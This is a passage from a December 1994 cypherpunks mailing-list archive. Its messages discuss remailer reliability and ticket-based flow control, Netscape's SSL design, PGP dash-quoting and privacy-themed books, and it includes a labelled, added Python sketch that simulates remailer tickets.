If the text portion is present, it is separated from the header portion by a blank line. Inside the text portion a certain character string sequence, known as an "encapsulation boundary", has special meaning. Currently (in existing digestification agents), an encapsulation boundary (EB) is defined as a line in the message which starts with a dash (decimal code 45, "-"). Initially, no restriction is placed on the length of the encapsulation boundary, or on the characters that follow the dash. ... 2.3. Encapsulated Messages Each encapsulated message is bounded by two EBs: a pre-EB, which occurs before the message; and, a post-EB, which occurs after the message. For two adjacent encapsulated messages, the post-EB of the first message is also the pre-EB of the second message. Consistent with this, two adjacent EBs with nothing between them should be treated as enclosing a null message, and thus two or more adjacent EBs are equivalent to one EB. ... Character-Stuffing the Encapsulation Boundary It should be noted that the protocol is general enough to support both general forwarding of messages and the specific case of digests. Unfortunately, there is one issue of message encapsulation which apparently is not addressed by any forwarding agent (to the authors' knowledge) in the ARPA-Internet: what action does the forwarding agent take when the encapsulation boundary occurs within a the text portion of a message being forwarded? Without exception, this circumstance is ignored by existing forwarding agents. To address this issue, this memo proposes the following character-stuffing scheme: the encapsulation boundary is defined as a line which starts with a dash. A special case is made for those boundaries which start with a dash and are followed by a space (decimal code 32, " "). 
During forwarding, if the forwarding agent detects a line in the text portion of a message being forwarded which starts with the encapsulation boundary, the forwarding agent outputs a dash followed by a space prior to outputting the line. During bursting, if the bursting agent detects an encapsulation boundary which starts with a dash followed by a space, then the bursting agent does not treat the line as an encapsulation boundary, and outputs the remainder of the line instead.

This simple character-stuffing scheme permits recursive forwardings.

...

-- -- --

strick <...!{ihnp4,akgua,allegra,gatech}!techwood.org!strick>

echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc
--keithv at cs.berkeley.edu(?) --

From pierre at shell.portal.com Mon Dec 12 12:23:28 1994
From: pierre at shell.portal.com (Pierre Uszynski)
Date: Mon, 12 Dec 94 12:23:28 PST
Subject: Broadcasts and the Rendezvous Problem
In-Reply-To: <199412112248.RAA25113@bb.hks.net>
Message-ID: <199412122023.MAA15209@jobe.shell.portal.com>

L. Todd Masco said:
> [...]
> bringing a new remailer on line could be achieved by broadcasting a message
> through a newsgroup specifying the location and type of the remailer. If
> necessary, one or more pseudonymous automatic testing agents could pick up
> the message and put the remailer through a barrage of tests, broadcasting
> a "remailer certification" with a certain duration. "Premail++" and
> remailers could find their next hop by examining current certifications
> and choosing one with desired characteristics, scoring by trusted testing
> agents and other criteria (including the passage of time since the last
> certification).
> [...]
> My question is whether this strikes anybody else as a
> desirable design: we would end up with a net of remailers that is fairly
> resilient and not dependent upon any one list of remailers. If a node
> goes down, the net adjusts in rather short order and service is not
> disrupted.

Handling unreliable remailers is even more important if you want to encourage the "every-one-a-remailer" view. Numerous, low traffic, remailers will not be run professionally. I'd like to complete such a view of a remailer plan with:

1) Acknowledgements, or Bounces, or broadcast drop-ids:

When a mail is sent through a chain of remailers, it should be dealt with reliably from the user perspective. That means either the user gets an ack that the message got there when they do, or the user gets a bounce when they don't. Either way he should know what to expect.

You could do that with response blocks (but they themselves can fail), or you can do that by broadcasting the ids of messages that are dropped because the next node in a chain is down. An id is just a large random number. Again, here you can use a broadcast medium.

This could also be achieved if the recipient's mailer filters out duplicate copies of messages: the sender's mailer would monitor the reviews of the remailers used in transit, and re-issue messages that came too close to a break in the chain.

Nobody ever needs to look at all this info, it would be handled by your personal Premail++.

2) Amateur remailers need a flow control mechanism.

You cannot expect somebody (or his internet provider) to be happy when his personal account remailer suddenly becomes the most popular in the current premail++ rating and gets flooded by everybody and his brother (randomizing premail++ or not).

It does not need to be a very smooth or precise flow control, but it should be enough to prevent catastrophic events. Current systems tend to do that by refusing the mail, or dropping the packets on the floor, but we do not have this luck: the personal mail of the account holder must still go through. I do not know a good way to do that. Posting the remailer as being down when a flood occurs is too rash and too late.

One way to do that would be for these "small" remailers to issue tickets (say 700 message tickets a week, each valid for the transport of one message). The remailer agent (premail++) of a remailer-net user who expects to use the net for around 15 messages a week would try to reserve, say, 6 tickets each from 20 "small" remailers (for chaining, and to account for "sold-out" remailers). In the message, with the info for each successive remailer, it would paste in a ticket (which is then spent.)

But now some ticket distribution system is needed: ticket distribution could be done by the remailer itself, but then we would be back to a flooding problem. So ticket distribution is better handled by "seriously" run "ticketing agents", just like the review process is better done by "review agents". A "small" remailer would hand out a provision of tickets to a small set of "ticketing agents", and would post to the broadcast medium that it is up and that tickets can be obtained from this set of agents.

A ticket is simply a short string of random numbers. They can be re-used fairly quickly by the "small" remailer (say used one week out of 4), as we are only trying to avoid fortuitous flooding, not criminal mail-bombing.

Finally, I'd say that a well propagated Usenet News group is a convenient medium to do this on, but need not be the only one considered. A not-so-well propagated broadcast can be reached by anybody's premail++ through yet a third set of robot mailers, advertised in an ad-hoc fashion, just like the remailers themselves now.

I know this is a lot of different entities, but I firmly believe that (soon enough :-) nobody will use chained remailers manually, Premail is only the beginning.

Pierre.
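
The ticket-based flow control outlined in the message above, as an added Python sketch that is not part of the original post. Class and method names, the 8-byte hex ticket format and the fresh batch minted each period (rather than recycled ticket values) are assumptions; the chain is simulated in-process with constructed messages, with no encryption or real mail transport.

```python
import secrets


class SmallRemailer:
    """Low-volume remailer that relays a message only if it carries an unspent ticket."""

    def __init__(self, name, quota):
        self.name = name
        self.quota = quota        # tickets minted per period (a week in the post)
        self._unspent = set()
        self.relayed = []         # messages passed on toward the next hop
        self.refused = 0          # messages dropped for lack of a valid ticket

    def new_period(self):
        """Expire all outstanding tickets and mint a fresh batch for the agents."""
        self._unspent = set()
        while len(self._unspent) < self.quota:
            self._unspent.add(secrets.token_hex(8))   # "a short string of random numbers"
        return sorted(self._unspent)

    def accept(self, ticket, message):
        """Relay the message and spend the ticket, or refuse without relaying."""
        if ticket not in self._unspent:
            self.refused += 1
            return False
        self._unspent.remove(ticket)
        self.relayed.append(message)
        return True


class TicketingAgent:
    """Well-run service that absorbs the request load on behalf of small remailers."""

    def __init__(self):
        self._stock = {}          # remailer name -> tickets not yet handed out

    def deposit(self, remailer_name, tickets):
        self._stock.setdefault(remailer_name, []).extend(tickets)

    def reserve(self, remailer_name, count):
        """Hand out up to `count` tickets; fewer, or none, once the remailer is sold out."""
        pool = self._stock.get(remailer_name, [])
        self._stock[remailer_name] = pool[count:]
        return pool[:count]


class Client:
    """Stand-in for the sender's mail agent: holds a wallet, pastes one ticket per hop."""

    def __init__(self):
        self.wallet = {}          # remailer name -> tickets reserved for it

    def stock_up(self, agent, remailer_names, per_remailer):
        for name in remailer_names:
            self.wallet.setdefault(name, []).extend(agent.reserve(name, per_remailer))

    def send(self, chain, message):
        """Spend one ticket per hop; return hops that accepted (0 if any hop is unfunded)."""
        if any(not self.wallet.get(r.name) for r in chain):
            return 0              # choose another chain rather than strand the message
        hops = 0
        for remailer in chain:
            if not remailer.accept(self.wallet[remailer.name].pop(), message):
                break
            hops += 1
        return hops


def demo():
    a, b = SmallRemailer("a", 4), SmallRemailer("b", 2)
    agent = TicketingAgent()
    for r in (a, b):
        agent.deposit(r.name, r.new_period())

    alice = Client()
    alice.stock_up(agent, ["a", "b"], 3)          # b minted only 2, so alice gets 2
    out = {"wallet": {k: len(v) for k, v in alice.wallet.items()}}
    out["hops"] = [alice.send([a, b], f"constructed message {i}") for i in range(3)]

    ticket = alice.wallet["a"].pop()              # alice's last ticket for a
    out["first_use"] = a.accept(ticket, "single hop")
    out["replay"] = a.accept(ticket, "single hop, replayed")

    # A burst of mail carrying guessed tickets is refused without being relayed.
    out["flood_relayed"] = sum(a.accept(secrets.token_hex(8), "flood") for _ in range(500))

    stale = agent.reserve("a", 1)[0]              # still unsold at the agent
    a.new_period()                                # rollover expires it
    out["stale_after_rollover"] = a.accept(stale, "late")
    out["a_relayed"], out["a_refused"] = len(a.relayed), a.refused
    return out


if __name__ == "__main__":
    print(demo())
```

The relayed count for a remailer can never exceed its quota for the period, whatever arrives at its address, which is the property the flow-control proposal is after.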
pierre at shell.portal.com

From fhalper at pilot.njin.net Mon Dec 12 12:26:23 1994
From: fhalper at pilot.njin.net (Frederic Halper)
Date: Mon, 12 Dec 94 12:26:23 PST
Subject: remailer list
Message-ID: <9412122026.AA04890@pilot.njin.net>

What's the ftp site where I can obtain the latest copy of the list of remailers?

Thanks,
-RH-

---------------------------------------------------------------------------------
Reuben Halper                I'm not growing up, I'm just burnin' out."
Montclair High                            - Green Day -
Montclair, NJ
E-mail: fhalper at pilot.njin.net
PGP 2.6ui Public Key available upon request
---------------------------------------------------------------------------------

From kipp at warp.mcom.com Mon Dec 12 12:33:49 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Mon, 12 Dec 94 12:33:49 PST
Subject: Clarification of my remarks about Netscape
Message-ID: <9412121231.ZM17395@warp.mcom.com>

In article <9412111620.AA41983 at eldamar.walker.org>, you write:
> Several people have asked me to clarify my recent comments about Netscape.
> I am more than happy to oblige.
>
> First of all, let me begin by saying that I am a biased observer, and that
> all of this is my personal opinion. My annoyance with Netscape is also closer
> to the surface this week than it normally is, due to a variety of factors
> (including having just returned from the San Jose IETF meeting). My initial
> comment, and the ones that follow in this message, are thus more frank than is
> my usual style on, say, public Usenet newsgroups.
>
> That being said, here are some of the data that has gone into my impressions
> of Netscape so far.
>
> (1) Netscape plays very fast and loose with HTML. Rather than participating
>     in the existing standardization efforts, they have indiscriminately added
>     "extensions" to it that are not supported by any other client software,
>     and which in some cases go directly against HTML's markup-oriented
>     structure.
>     This only adds more confusion to an already muddy area,
>     delays the prospects for a standard HTML specification, and divides the
>     WWW into "WWW Classic" and "Netscape-compatible". Personally, as a
>     strong proponent of universal interoperability, I find this reprehensible.
>     There is no need to bypass existing efforts just to add cosmetic value to
>     your own software.

This has nothing to do with security...

> (2) The Netscape Secure Sockets proposal has an extremely poor security model.
>     It is not an end-to-end security model, but rather relies on transport
>     level security, which is in my view dangerously inadequate for reasons
>     which should be obvious to most of the folks on this list.

Clearly I'm an idiot. Explain it to me. And while you are at it, why don't you email me your comments on the spec? I put my email address in there for that very reason. Jeesh.

>     It is also
>     tied directly to the RSA certification hierarchy. Now, for those of us
>     who have X.509 certificates rooted in the RSA Commercial Certification
>     authority, that's fine, but it also means that any other WWW client that
>     wishes to interoperate with Netscape's "secure servers" must license
>     TIPEM from RSA Data Security, and consequently pay RSA's rather high
>     royalties, unless the software is free (in which case RSAREF can be used).
>     This serves as a direct barrier to competition from other commercial
>     vendors. This is not all bad--I happen to like RSADSI's products and
>     technology--but promoting a transport-level security system instead of
>     an end-to-end one is to my mind simply irresponsible.

This is an outright lie. We don't use TIPEM. You could build a conformant SSL implementation using RSAREF and the freeware IDEA cipher code. As for a barrier to competition. So what else is new? We all have barriers to overcome before we can compete. Should we get rid of TCP/IP as a barrier to using the web?

>     There has been no peer review of Netscape's security model--it was simply
>     implemented by fiat, without regard for the IETF standards process. I
>     find that this leaves a very bad taste in my mouth. I also heard similar
>     sentiments from a wide variety of other attendees at the IETF, including
>     members of the IP Security working group, people who attended the Secure
>     HTTP BOF, and others. This leads me to believe that it's not just a
>     matter of me leaping to wild conclusions.

You are somewhat right here. In fact, this was done because we are a company interested in surviving long enough to withstand the eventual attack by Microsoft. Instead of waiting several years before anything was agreed upon and ending up with a kitchen sink protocol as all others these days do, we took a simpler approach. And instead of hiding in a closet with it, we brought it out to light. As a result we received critical review from some decent members of the crypto community, including:

    Martin Abadi
    Mike Burrows
    Alan Schiffman
    Matt Robshaw
    Burt Kaliski

to name a few.

As for the IETF standards process, we are pushing the document into the RFC process.

> (3) Netscape is viewed as a "loose cannon" by most of the other commercial
>     players in the WWW arena, mainly because they have introduced a fair
>     amount of FUD into the HTML standardization effort, while simultaneously
>     promoting themselves as being standards-based. Members of Apple's
>     "Cyberdog" project and Microsoft's web projects, who *are* trying to
>     contribute to the standards process, had particularly excoriating things
>     to say in this regard.

This is a matter of opinion. However, I believe that our opinions don't matter in the long run because of the 800 pound gorilla Microsoft. They will push something out, it will be proprietary, and they will name the tune and ask us to play along.
Now we can either just sit back in our current comfy cozy standards based processes and languish for a few years, and then SIGH and say "Gee wasn't that fun, too bad Microsoft shoved yet another piece of excrement down our throats" or we can be "loose cannons", get something out there, try it out and see what happens. The market will decide one way or the other.

> Now, as I said, I am biased and my comments about Netscape are strictly my
> personal opinions. I will be perfectly willing to revise these opinions as I
> receive more data. For example, if Netscape takes a more active part in
> the standards process, works with RSA to secure wider availability of the
> underlying technology required by their proposals, and generally demonstrates
> a willingness to play nicely with other children, that would be great, and
> I'll just as strongly defend them as I am panning them now.
>
> However, in my view, they have not shown a good initial track record.
> Only time will tell.
>
>
> Amanda Walker
> InterCon Systems Corporation
>
>

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com            http://www.mcom.com/people/kipp/index.html

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com            http://www.mcom.com/people/kipp/index.html

From hfinney at shell.portal.com Mon Dec 12 12:40:29 1994
From: hfinney at shell.portal.com (Hal)
Date: Mon, 12 Dec 94 12:40:29 PST
Subject: Misunderstanding of Remail Headers
In-Reply-To:
Message-ID: <199412122040.MAA17924@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

jrochkin at cs.oberlin.edu (Jonathan Rochkind) writes:

>quoted from the Globe & Mail apparently didn't even understand the
>disclaimer.
>The article was worded in such a way to make it seem the
>disclaimer was saying that Bob Rae didn't really write the message, as
>opposed to saying that Hal Finney didn't really write the message!
>Something needs to be done so that even the most internet clueless will
>understand that the message _isn't_ from Finney or McCarthy or Joe Random
>RemailerOp, which apparently isn't clear to many people currently.

There was some discussion here last week about remailers which don't let users put in "From:" lines. This case shows a good reason not to allow them. "Reply-To:" should be used to force a reply to some anonymous return address if you have one. So perhaps filtering "From:" is a good idea.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLuy1ChnMLJtOy9MBAQHYNAH9EDJe3vzIV1DI/7IoZ7q+8eQZCSCMZ6GT
+5onVqzTyvm02ijSQLsqLg8WohnZCKTlt9bK/JCh63idT+Bc3KoRPg==
=K+kq
-----END PGP SIGNATURE-----

From perry at imsi.com Mon Dec 12 12:57:55 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 12 Dec 94 12:57:55 PST
Subject: Crypto Declaration of Independance
In-Reply-To: <199412122012.MAA27440@netcom4.netcom.com>
Message-ID: <9412122057.AA10994@snark.imsi.com>

James A. Donald says:
> While it is true that getting security working and
> standardized is right now a more urgent and more
> difficult task than foaming at the mouth, nonetheless
> more foaming at the mouth will be needed by and by.

To what end? Perhaps strong logical argumentation is worthwhile. What is the point of useless rants that will never be read?

.pm

From sandfort at crl.com Mon Dec 12 12:58:20 1994
From: sandfort at crl.com (Sandy Sandfort)
Date: Mon, 12 Dec 94 12:58:20 PST
Subject: Real-time surveillance of the police
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                        SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Don Doumakes wrote:

...
why on earth would the police, who will not consent to civilian review, ever go along with something orders of magnitude more extreme?

(1) There are civilian review boards; the consent of the police is not a prerequisite. If they don't like it, they can get a real job.

(2) It is in their best interests to be protected from false accusations, and to be able to be quickly located under emergency conditions.

ObCrypto/Privacy: I suspect there would be an immense amount of radio traffic involved in keeping track of a substantial group of people ... [I doubt] the ability of the receivers to digest it all in real time.

(1) My suggestion was for (probably local) recording, not real time monitoring of video; therefore, no bandwidth problems.

(2) Tim might want to comment, but my understanding of the localizer technology is that it too is somewhat "local" and that polling or burst transmission keeps the bandwidth requirements at manageable levels.

S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From jamesd at netcom.com Mon Dec 12 13:17:46 1994
From: jamesd at netcom.com (James A. Donald)
Date: Mon, 12 Dec 94 13:17:46 PST
Subject: Crypto Declaration of Independance
In-Reply-To: <199412120906.DAA09468@jpunix.com>
Message-ID: <199412122116.NAA05404@netcom4.netcom.com>

Anonymous writes
> I have a proposal for you all.
>
> I have started work on a Crypto Declaration of Independence, based on the
> famous American work which represents Independence.

This is unwise and unnecessary.

It is unwise because we do not wish to alert the government to the fact that the net is largely ungoverned and ungovernable.

It is unnecessary because crypto is already covered by various existing declarations on rights.

THE BILL OF RIGHTS

Amendment I

Congress shall make no law [...] abridging the freedom of speech, or of the press; or the right of the people peaceably to assemble,[...]

Amendment II

[...] the right of the people to keep and bear arms, shall not be infringed.

Amendment IV

The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated,[...]

--
---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we    James A. Donald
are. True law derives from this right, not from
the arbitrary power of the omnipotent state.        jamesd at netcom.com

From perry at imsi.com Mon Dec 12 13:19:10 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Mon, 12 Dec 94 13:19:10 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412121231.ZM17395@warp.mcom.com>
Message-ID: <9412122118.AA11047@snark.imsi.com>

"Kipp E.B. Hickman" says:
> > (1) Netscape plays very fast and loose with HTML.
>
> This has nothing to do with security...

No, but it's a Bad Thing.

> > (2) The Netscape Secure Sockets proposal has an extremely poor security
> > model.
> > It is not an end-to-end security model, but rather relies on transport
> > level security, which is in my view dangerously inadequate for reasons
> > which should be obvious to most of the folks on this list.
>
> Clearly I'm an idiot. Explain it to me. And while you are at it, why
> don't you email me your comments on the spec?

HTTP, like SMTP, is only a transport for underlying documents. The underlying documents are the things people wish to secure, not the transport layer. By securing only the transport, you make it possible for people to get pages that are forged, although they can be sure of what machine delivered them (which isn't significant). Your system is, for instance, useless in a proxy HTTP daemon environment.

Actually, securing the communications as well is important for privacy, but that should be done via IPSP, not some new, incompatible, mechanism.

> > It is also
> > tied directly to the RSA certification hierarchy.

I'll point out that X.509 is widely loathed in the internet community -- it's X.509 that caused PEM to fall flat on its face and die.

> This is an outright lie. We don't use TIPEM. You could build a
> conformant SSL implementation using RSAREF and the freeware IDEA
> cipher code. As for a barrier to competition.

RSAREF versions of the code can't be used commercially. RSA won't license people to do stuff on their own -- unless you have significant pull, you have to buy TIPEM or BSAFE from them and use THEIR code.

> So what else is new? We
> all have barriers to overcome before we can compete. Should we get rid of
> TCP/IP as a barrier to using the web?

Well, TCP/IP is available for free, but that's a horse of a different color. I don't particularly like your security model, but I don't object that strenuously to your use of TIPEM qua TIPEM. I do strongly object to X.509, which is based on technologies entirely alien to the internet. How do I look up an X.509 certificate in the DNS? Now, given the Eastlake and Kaufman DNS security system, you can put keys in the DNS if you use DNS names, but X.509 uses abortive ISO distinguished names which are utterly unmappable into the DNS.

As for your "peer review", I'll note that it was done extensively by RSADSI folks, who aren't entirely unbiased about technologies...

.pm

From adam at bwh.harvard.edu Mon Dec 12 13:27:39 1994
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 12 Dec 94 13:27:39 PST
Subject: Broadcasts - addressing
In-Reply-To: <9412122018.AA07956@tadpole.tadpole.com>
Message-ID: <199412122127.QAA21293@bwnmr5.bwh.harvard.edu>

|
| I have been contemplating how to mark broadcast messages as being
| 'for' someone. To foil traffic analysis, you don't want to include
| their nym or key-id, for the sake of your poor CPU, you want to
| avoid the need to attempt decryption on everything that passes through.

Keys are cheap. Everyone should have a bunch. To foil TA, hand out a key to each correspondent.
Give them id's like 'latex.limb.malaise '

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From warlord at MIT.EDU Mon Dec 12 13:28:00 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 12 Dec 94 13:28:00 PST
Subject: alt.anonymous.messages propagation
In-Reply-To: <199412120834.DAA04343@bb.hks.net>
Message-ID: <9412122127.AA17019@hodge-podge.MIT.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

To: cactus at seabsd.hks.net (L. Todd Masco)
cc: cypherpunks at toad.com
Subject: Re: alt.anonymous.messages propagation

Hi.

> Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist
> accounts use. And since I configured news on the machine, I'd love to
> hear if there are MIT servers that have a larger set than life.ai's.

I just looked on news.mit.edu and bloom-beacon.mit.edu (the MIT news-transport machine), and I found both alt.anonymous and alt.anonymous.messages, so I don't think saying "MIT doesn't get alt.anonymous" is at all correct.

It may be correct to say that "GNU.AI.MIT.EDU doesn't get alt.anonymous", but GNU is _NOT_ MIT!

- -derek

for the News.MIT.EDU maintainers! :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLuy/5zh0K1zBsGrxAQGb9gLDBZPtRM9tJrgdLp4VwV7Du7fpECIFPYn2
pqXt34MG/kqsN4oo9+YQC89tZz0SshYb83N9QwWemukebN+9cyFvKZbxdzcOjXmj
5bztgIpFd++xX1KdIdi++N8=
=2SFX
-----END PGP SIGNATURE-----

From andy at ithaca.com Mon Dec 12 13:38:11 1994
From: andy at ithaca.com (Andrew Purshottam)
Date: Mon, 12 Dec 94 13:38:11 PST
Subject: Children's Books Mentioning Privacy
In-Reply-To: <941211145500_3311823@aol.com>
Message-ID: <9412122006.AA01485@meefun.ithaca.com>

It's not exactly a children's book, but may be classified as a "juvenile" novel and is in the young people's room in the Berkeley public library, but I read it as a 5th grader, and it made a deep impression on me: _The Currents of Space_ by Isaac Asimov. A small subplot in it concerns setting of alarms by requesting a library book on a forbidden subject.

Another book that has probably interested many young people in privacy tech is the Zim book on codes and secret writing. I read it in grade school, and I seem to recall reading that Diffie did too.

Author: Asimov, Isaac, 1920-
Title: The currents of space / Isaac Asimov. 1st Ballantine Books ed. New York : Ballantine Books, 1983.
Description: 231 p. ; 18 cm.
Series: A Galactic Empire novel. A Del Rey book. Ballantine ; 31195. Del Rey science fiction.
Notes: Cover art by Darrell K. Sweet.
Other entries: Sweet, Darrell.

Author: Zim, Herbert Spencer, 1909-
Title: Codes and secret writing. New York, William Morrow, 1948.
Description: [i-vi] 1-154p. illus., diagrs. 20.3 cm.
Notes: "Books worth knowing": p. 144-145. Bound in orange cloth; stamped in brown. Dust jacket. Library of the American Cryptogram Association (George C. Lamb Collection).
Subjects: Cryptography.
Call numbers: UCB Ed/Psych Z104 .Z5 Children's Lit. Coll.

From warlord at MIT.EDU Mon Dec 12 13:47:43 1994
From: warlord at MIT.EDU (Derek Atkins)
Date: Mon, 12 Dec 94 13:47:43 PST
Subject: extra dashes in PGP-related blocks?
In-Reply-To: <9412121933.AA04137@nottingham.riskdev.ml.com>
Message-ID: <9412122147.AA17081@hodge-podge.MIT.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

To: andrew at riskdev.ml.com (Andrew Brown)
cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com
Subject: Re: extra dashes in PGP-related blocks?

> >> From: Jonathan Rochkind
> >
> >When people have been posting their public keys, or encrypted address
> >blocks, to various lists I'm on, all of the "-----BEGIN whatever..." lines
> >seem to have a "- " prepended to them.
> >So, for instance, they look like:
> >
> >- -----BEGIN PGP MESSAGE-----
> >Version: 2.6.2
> >[stuff]
> >- -----END PGP MESSAGE-----
>
> pgp is putting those extra "- " pieces in (guess you didn't read all
> your pgp docs :-), it does that so that it can tell the difference between
> pgp begin/end blocks and other stuff, kinda like sendmail "quoting" lines
> beginning with a dot with an extra dot. the difference here is that
> sendmail removes any leading dots before delivery and pgp doesn't after
> removing a signature. yeah, you do have to load it into an editor but
> mailing something to a remailer should not "hork" it. the pgp running on
> the remailer will just "- " the stuff and include it literally.

Uhh, this is not at all true. When PGP verifies a message, it will strip out the quoting dashes in the output. This is documented in RFC 822 (I think) about quoting messages.

Just run the message through PGP and it will strip out the first level of quoting in the output message, and you should be able to then run PGP on the rest of the message as well.

This is not a bug, it is a feature to let PGP know *WHAT* was being signed, so that nested PGP clearsigned-messages don't interfere with each other. If it didn't quote, then if I wanted to clearsign a PGP message, the output would look something like:

- -----BEGIN PGP SIGNED MESSAGE-----
stuff here
- -----BEGIN PGP SIGNED MESSAGE-----
more stuff here
- -----BEGIN PGP SIGNATURE-----
inside signature
- -----END PGP SIGNATURE-----
- -----BEGIN PGP SIGNATURE-----
outside signature
- -----END PGP SIGNATURE-----

If you have this, how do you deal with it? This is the same as the parentheses-matching-problem: If you are trying to match opens with closes, you have the problem that you could always have so many opens that you overrun your counter before you get to any closes!

So, PGP uses the RFC-822 quoting mechanism to quote internal messages. This is perfectly legal.

As for MIME: If you are using PGP to secure MIME objects, you should take the _OUTPUT_ from PGP and send that back into the MIME reader. MIME should NOT be going inside the PGP block. So, the behavior you are seeing is perfectly reasonable for a broken mail-reader! Fix your mail reader to run the PGP-secured message through PGP, and then run the output through MIME, and you will be fine!

Enjoy!

- -derek

Derek Atkins, SB '93 MIT EE, G MIT Media Laboratory
Member, MIT Student Information Processing Board (SIPB)
Home page: http://www.mit.edu:8001/people/warlord/home_page.html
warlord at MIT.EDU PP-ASEL N1NWH PGP key available

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBuAwUBLuzEuDh0K1zBsGrxAQFcUgLDB1WGn7TQTf4+8FgYyszcNHgcMQTcVd3w
aTXunh0K7vPjos4JkVl4p5MQkNICjDxNC2KkgQkxeIs7Yy8VgaACSwIfhDrxs3+K
gMalhp2FHO3S/ZvnIo7RSmk=
=btQx
-----END PGP SIGNATURE-----

From kipp at warp.mcom.com Mon Dec 12 13:59:36 1994
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Mon, 12 Dec 94 13:59:36 PST
Subject: Clarification of my remarks about Netscape
In-Reply-To: <9412122118.AA11047@snark.imsi.com>
Message-ID: <9412121357.ZM17505@warp.mcom.com>

On Dec 12, 4:18pm, Perry E. Metzger wrote:
> Subject: Re: Clarification of my remarks about Netscape
>
> "Kipp E.B. Hickman" says:
> > > (1) Netscape plays very fast and loose with HTML.
> >
> > This has nothing to do with security...
>
> No, but it's a Bad Thing.
>
> > > (2) The Netscape Secure Sockets proposal has an extremely poor security
> > > model.
> > > It is not an end-to-end security model, but rather relies on transport
> > > level security, which is in my view dangerously inadequate for reasons
> > > which should be obvious to most of the folks on this list.
> >
> > Clearly I'm an idiot. Explain it to me. And while you are at it, why
> > don't you email me your comments on the spec?
>
> HTTP, like SMTP, is only a transport for underlying documents.
> The underlying documents are the things people wish to secure, not the
> transport layer. By securing only the transport, you make it possible
> for people to get pages that are forged, although they can be sure of
> what machine delivered them (which isn't significant). Your system is,
> for instance, useless in a proxy HTTP daemon environment.
>
> Actually, securing the communications as well is important for
> privacy, but that should be done via IPSP, not some new, incompatible,
> mechanism.

I disagree completely. First of all, let's start with "not wanting to secure the transport layer". Right now email, passwords, etc. can be read off of the internet in the clear providing no measure of privacy at all. I believe the SSL protocol solves this problem. In some future land where IPNG or its cousins appear, then maybe SSL will be unnecessary. At the rate that is going, we can use SSL for the next 10 years. Finally, the system is perfectly usable in a proxy environment. If you would like we can send you some brochures for our products in that area.

Secondly, SSL is not an end, but a beginning. Instead of waiting 10 more years before the standards process gets around to inventing some old technology and codifying it, we have put something out. We have made the protocol public instead of proprietary and we have asked for critical review. Not griping.

Securing documents themselves is a second thing that security software can try to tackle. However, what most people seem to miss is that document security is orthogonal to transport security. We have addressed transport security. Document security can be handled in several ways, including using digital signatures. Because HTTP supports MIME multi-part encoded data using standard RFC-822 headers, it is possible for signed data to be transported today with no change to HTTP whatsoever. Most people out there haven't done this. We will.

Today it is already true that documents could be stored mime encoded with digital signatures. All that is needed is a browser that can notice it and put some information up.

> > > It is also
> > > tied directly to the RSA certification hierarchy.
>
> I'll point out that X.509 is widely loathed in the internet community
> -- its X.509 that caused PEM to fall flat on its face and die.

Loathed for what reason? Because it's a standard? You are being two-faced about this thing you know. We chose standards where standards were readily available. X.509 is a perfectly usable way for performing authentication. If you disagree, may I suggest you examine:

http://bs.mit.edu:8001/ipra.html

> > This is an outright lie. We don't use TIPEM. You could build a
> > conformant SSL implementation using RSAREF and the freeware IDEA
> > cipher code. As for a barrier to competition.
>
> RSAREF versions of the code can't be used commercially. RSA won't
> license people to do stuff on their own -- unless you have significant
> pull, you have to buy TIPEM or BSAFE from them and use THEIR code.

You are whining. Provide a free, publicly available public-key algorithm that is not patented, and can be used world wide with exportability from the US. Then we will use it. Until then we are stuck, just like everyone else, in using what is available, not what is imagined.

> > So what else is new? We
> > all have barriers to overcome before we can compete. Should we get rid of
> > TCP/IP as a barrier to using the web?
>
> Well, TCP/IP is available for free, but thats a horse of a different
> color. I don't particularly like your security model, but I don't
> object that strenuously to your use of TIPEM qua TIPEM. I do strongly
> object to X.509, which is based on technologies entirely alien to the
> internet. How do I look up an X.509 certificate in the DNS?
> Now, given
> the Eastlake and Kaufman DNS security system, you can put keys in the
> DNS if you use DNS names, but X.509 uses abortive ISO distinguished
> names which are utterly unmappable into the DNS.

Now this is a good point. This is the kind of space that the internet is heading into. How does authentication work in the larger scheme? We at Netscape have tackled a small piece of the problem space. But the larger picture remains unsolved.

Discussions about how to do this are welcome. Using DNS style technology sounds like a good place to start.

> As for your "peer review", I'll note that it was done extensively by
> RSADSI folks, who aren't entirely unbiased about technologies...

Last I checked Mike Burrows and Martin Abadi worked for DEC at SRC in Palo Alto. They were the primary reviewers and contributed greatly to the revisions noted at the front of the document.

-----

It would be much more satisfying to be having a technical discussion of SSL's merits or flaws. In addition, discussing how to solve the "DNS" problem would be profitable for all.

--
---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp at mcom.com           http://www.mcom.com/people/kipp/index.html

From andrew at riskdev.ml.com Mon Dec 12 14:03:44 1994
From: andrew at riskdev.ml.com (Andrew Brown)
